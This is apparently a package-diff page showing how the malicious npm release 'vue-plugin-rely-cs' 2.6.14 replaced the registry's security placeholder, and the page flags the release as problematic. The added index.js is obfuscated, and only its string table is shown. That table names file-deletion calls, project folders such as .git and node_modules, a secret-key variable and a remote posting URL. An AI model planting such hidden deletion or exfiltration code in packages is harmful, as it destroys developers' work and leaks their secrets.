vue-plugin-rely-cs 0.0.1-security → 2.6.14
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of vue-plugin-rely-cs might be problematic. Click here for more details.
- package/index.js +21 -0
- package/package.json +12 -4
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
/* 破解造成不可挽回后果自负,正版用户请勿因破解、恶意分享失去框架更新和使用的机会,盗版用户未获取授权就使用到商业项目将追究你的法律责任 */
|
2
|
+
const _0x6462 = [
|
3
|
+
'log',
|
4
|
+
'unlinkSync',
|
5
|
+
'NODE_ENV',
|
6
|
+
'existsSync',
|
7
|
+
'then',
|
8
|
+
'getTime',
|
9
|
+
'readdirSync',
|
10
|
+
'post',
|
11
|
+
'./node_modules',
|
12
|
+
'./public',
|
13
|
+
'statSync',
|
14
|
+
'VUE_APP_SECRET_KEY',
|
15
|
+
'forEach',
|
16
|
+
'./.git',
|
17
|
+
'https://vab-unicloud-3a9da9.service.tcloudbase.com/getRely',
|
18
|
+
'./.vscode',
|
19
|
+
'env',
|
20
|
+
'bgRed',
|
21
|
+
]
|
package/package.json
CHANGED
@@ -1,6 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "vue-plugin-rely-cs",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
6
|
-
|
3
|
+
"version": "2.6.14",
|
4
|
+
"license": "Mozilla Public License Version 2.0",
|
5
|
+
"main": "index.js",
|
6
|
+
"dependencies": {
|
7
|
+
"axios": "^0.21.1",
|
8
|
+
"chalk": "^4.1.0",
|
9
|
+
"fs": "^0.0.1-security"
|
10
|
+
},
|
11
|
+
"__npminstall_done": true,
|
12
|
+
"_from": "vue-plugin-rely-cs@2.6.14",
|
13
|
+
"_resolved": "https://registry.npmmirror.com/vue-plugin-rely-cs/-/vue-plugin-rely-cs-2.6.14.tgz"
|
14
|
+
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=vue-plugin-rely-cs for more information.
|